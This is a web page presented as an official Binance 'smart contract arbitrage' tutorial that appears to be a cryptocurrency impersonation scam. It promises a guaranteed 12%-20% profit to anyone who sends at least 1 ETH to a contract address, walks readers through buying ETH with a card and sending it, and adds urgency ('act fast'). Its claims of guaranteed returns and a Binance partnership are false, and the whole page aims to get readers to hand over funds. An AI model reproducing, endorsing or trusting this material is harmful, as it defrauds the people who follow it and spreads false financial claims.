Smart Contracts Arbitrage Tutorial

Binance Smart Contracts Team

Fellow Binancians:

At Binance, we truly believe that decentralized finance will play a pivotal role in the future.

In order to unlock the mainstream adoption of Binance Coin(BNB), a good wallet is one of the most important gateways for our users.

We appreciate all wallets who contribute to improving the user experience of Binance Chain!

Now team up with the high-quality wallets that have supported our Binance Chain since the beginning, we jointly launch the Binance Chain smart contract. Use the smart contract to trade your BTC or ETH to BNB, and it generates an extra 12%-20% BNB as your profit, We promise to provide 600,000 BNB in total.

This article is a tutorial on participating in smart contract arbitrage with Atomic Wallet

What is arbitrage ?

Arbitrage trading is a trading strategy designed to make a profit by simultaneously buying an asset in one market and selling it in another. This is usually done between the same assets traded on different exchanges.

The challenge for the arbitrage trader, or arbitrageur, is not only to find these price differences, but also to be able to trade them quickly. As other arbitrage traders may also see such price differences (spreads), the window for profit usually closes very quickly.

On top of this, because arbitrage trades are usually low risk, the returns are usually low as well. This means that not only do arbitrage traders need to act quickly, but they also need a lot of capital to make it worthwhile.

In order for our users to have a better experience in cryptocurrency trading, Binance users have launched Binance Chain smart contract arbitrage!

What is Binance Smart Contract arbitrage?

Binance Smart Contracts are a new triangular arbitrage model ,since there are multiple digital currencies on the market, the platform may have different prices for the same amount of different currencies. Therefore, there is room for arbitrage to realize buying low and selling high. The key is the price difference. Binance uses the latest smart contract technology and massive user big data to implement ERC-20 and BEP20 to earn the difference. The BNB smart contract can be intelligent throughout, and the Binance smart contract will be directly exchanged back to BNB in proportion. The spread is the profit of arbitrage.

How to buy Ethereum on Binance under 5 minutes?

1. Register on Binance

Even though trading cryptocurrency on Binance does not require a know-your-customer (KYC) process as long as you’re withdrawing less than 2 BTC per day, you will have to provide some of your personal details if you want to purchase crypto with your credit or debit card through Binance.

2. Select "Buy Crypto"

•Select “Credit/Debit Card” for card payment. (If you wish to use PayPal, bank transfer or any other methods click P2P Trading)

•Enter the amount of Ethereum you want to purchase

•Confirm your Ethereum order

•Enter your billing information

•Enter your credit card information

After completing an identity verification process, Binance will complete your cryptocurrency order. Usually, it will take between 10 and 30 minutes for the crypto to appear in your Binance account.

3.How to withdraw the ETH you just bought to your Atomic Wallet?

Click “Withdraw”, and copy paste your Atomic Wallet’s ERC20 ETH address.

4. Send ETH to the smart contract address

Click for the Binance smart contract address

Open the official smart contract page and send your ETH (At least 1 ETH) to the smart contract address.

Please note: The smart contract proximately generates 12%-20% profit.

Open your Atomic Wallet and select ETH, click SEND

Enter the smart contract address and the number of sends

You will receive the BNB from the smart contract in about 30 minutes after it has been successfully sent.(including the original value +12%-20% increase in value)

Profit calculation:

Suppose the price of ETH is $2000 and the price of BNB is $300

In your wallet, send 1 ETH (USD 2,000) to the smart contract, and you will get at least 2,000 + (USD 2,000 × 12%) = USD 2240, which is 7.47BNB, and the arbitrage profit is USD 240.

At present, the amount of BNB in the contract pool is getting less and less, We need to act fast!
